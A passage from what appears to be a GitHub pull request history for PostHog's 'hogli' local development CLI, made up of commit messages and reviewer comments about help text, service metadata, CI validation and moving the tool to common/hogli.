- Better alignment with mprocs-first workflow
- Consistent command naming (singular verbs)
- Maintains backward compatibility (hidden commands still work)

webjunkie committed:
chore(hogli): address remaining PR feedback

Remove ASCII art, update docs structure, add deprecation markers

- Remove HEDGEHOG_ART from cli.py (ascii art not needed)
- Add Orbstack compatibility note to flox manifest
- Update flox activation message to use hogli commands instead of bin/
- Restructure README into Part 1 (user guide, will move to handbook) and Part 2 (dev guide, stays in repo)
- Add deprecation comments to package.json for commands with hogli equivalents (format, start, migrations)

Addresses feedback from rafaeelaudibert on PR #39965

webjunkie committed:
fix(hogli): add Orbstack recommendation to docker service metadata

Add Orbstack recommendation to docker service description in manifest. Shows up in hogli meta:concepts and docker command help text.

webjunkie committed:
feat(hogli): improve help text formatting with structured sections

Add clear headers and better visual hierarchy to command help output:
- "Uses:" header for infrastructure services
- Bullet points (•) for each service with paragraph breaks
- "Executes:" label for underlying commands

Makes help output much more readable by using paragraph breaks to separate services instead of trying to fight Click's text wrapping.

Example output:
```
Uses:

• Docker: Isolates services...

• PostgreSQL: Primary relational database...

Executes: bin/start
```

webjunkie committed:
feat(hogli): add service metadata to more commands

Add infrastructure service context to commonly-used commands that were missing it:

- dev:setup: postgresql, clickhouse
- dev:demo-data: postgresql, clickhouse
- docker:services:up: docker, postgresql, clickhouse, redis, kafka
- docker:services:down: docker
- migrations:check: postgresql, clickhouse
- migrations:sync-flags: postgresql

Makes help output more informative by showing which infrastructure components each command interacts with.

webjunkie committed:
feat(hogli): add infrastructure concepts for new developers

Add missing services/topics to help new developers understand PostHog's architecture:

New concepts:
- Celery: distributed task queue for background jobs
- Plugin server: event ingestion pipeline
- Django: web framework powering backend
- Frontend: React app with TypeScript/Vite/Kea
- mprocs: process orchestrator for dev environment

Also added documentation comment explaining that services are educational resources for new developers, appearing in help text and `hogli meta:concepts`.

Updated commands to reference new services:
- start: now shows complete architecture (11 services)
- start:backend: includes Django
- start:celery: includes Celery
- start:frontend: includes Frontend
- start:worker: includes Celery and Plugin server
- build:frontend: includes Frontend

Example output from `hogli start --help` now gives new developers a complete overview of PostHog's infrastructure in one place.

webjunkie committed:
fix(hogli): show full bin/ path in help text

Change `Executes:` line to show `bin/start` instead of just `start`. Makes it clearer to users what's actually being invoked.

Before: Executes: start
After: Executes: bin/start

webjunkie committed:
Merge remote-tracking branch 'origin/master' into feature/local-dev-cli

# Conflicts:
#	.flox/env/manifest.toml

webjunkie committed:
fix: skip auto-add during git hooks to prevent manifest modification

Auto-add was modifying manifest.yaml during lint-staged execution,
causing pre-commit hooks to fail. Now detects git hook environment
(GIT_DIR or HUSKY env vars) and skips auto-update in those contexts.

webjunkie committed:
chore: add clickhouse-logs-init to manifest and normalize YAML formatting

Auto-discovery added clickhouse:logs:init bin script from master merge.
YAML formatting normalized to 2-space indentation by prettier.

webjunkie committed:
chore: add hogli manifest validation to Python CI

Validates that all bin scripts are documented in hogli/manifest.yaml.
Prevents missing command definitions from being merged.

webjunkie committed:
chore: add hogli and bin paths to Python CI filter

Ensures Python CI runs when hogli CLI or bin scripts change.
Required for hogli meta:check validation to execute on relevant PRs.

webjunkie committed:
chore: add hogli and bin directories to DevEx code ownership

Sets DevEx team as soft owners for hogli CLI and bin scripts.
Ensures team reviews for developer tooling changes.

github-actions[bot] committed:
Update UI snapshots for `chromium` (14)

github-actions[bot] committed:
Update UI snapshots for `chromium` (14)

mariusandra reviewed (commented):
I'd say this looks promising even if we'd need to spend some time on re-education. So I'm happy to ✅ and play around. However... can we move the `hogli` folder to `common/hogli`? That's the home for all the various common packages, just to keep the root folder as clean as we can.

webjunkie committed:
refactor(hogli): move to common/ and separate core framework from developer extensions

Move hogli from root to common/hogli/ to avoid polluting monorepo root level.
Separate framework internals (core/) from developer extension points.

Structure:
- common/hogli/core/ - Framework internals (CLI, manifest, command types)
- common/hogli/manifest.yaml - Developer configuration
- common/hogli/commands.py - Developer Click command extension point
- common/hogli/tests/ - Test suite

This allows clean imports (from hogli.core.cli) while keeping hogli as a
top-level package within common/, making it easier to extend with custom
Click commands.

webjunkie committed:
fix(hogli): update bin entry point and pytest config for new location

Update bin/hogli to add common/ to sys.path for clean imports.
Update pytest.ini to include common/ in pythonpath.

This enables importing as 'from hogli.core.cli' instead of
'from common.hogli.core.cli', treating hogli as a proper top-level
package within the common/ directory.

webjunkie committed:
chore(ci): update paths and add hogli tests to CI pipeline

Update ci-python.yml to:
- Monitor common/hogli/** for changes instead of hogli/**
- Add hogli test suite execution with coverage reporting

Update CODEOWNERS-soft to reflect new common/hogli/ location.

github-actions[bot] committed:
Update UI snapshots for `chromium` (9)

webjunkie committed:
fix(hogli): resolve mypy type errors

Add type annotations and ignore comments to fix:
- manifest.py: explicit list[str] annotation for commands variable
- command_types.py: return type Any for register methods, type ignore for dynamic attribute
- cli.py: correct type signature for sorted() key function parameter

webjunkie committed:
chore(hogli): merge master into feature branch

webjunkie committed:
fix(hogli): add language spec to fenced code block and update lockfile

Add language spec to README decision tree code block to pass markdown linting.
Update uv.lock from merge.

rafaeelaudibert reviewed (approved):
Let's merge and test

webjunkie committed:
fix(hogli): add check_uv_python_compatibility.py to manifest as hidden

CI-only script for validating uv/Python version compatibility.
Added from master after our merge point.

webjunkie committed:
refactor(hogli): use explicit section placement for categorization instead of prefix matching

Change manifest categorization from prefix inference to direct section lookup.
Commands are now categorized by which manifest section they're placed in,
making categorization explicit rather than implicit.

Changes:
- Update get_category_for_command() to check direct section membership first
- Fall back to prefix matching only for Click-only commands not in manifest
- Move composition commands to proper semantic categories:
  - dev:reset → core (from compositions)
  - services:ready → health_checks (from compositions)
  - build:schema, build:grammar → build (from compositions)
- Remove "compositions" category entirely (was implementation detail)
- Delete unused "precommit" command

Result: Commands organize naturally by purpose in YAML, Click extensions
inherit categorization from related manifest commands via prefix matching.

webjunkie committed:
Merge remote-tracking branch 'origin/master' into feature/local-dev-cli
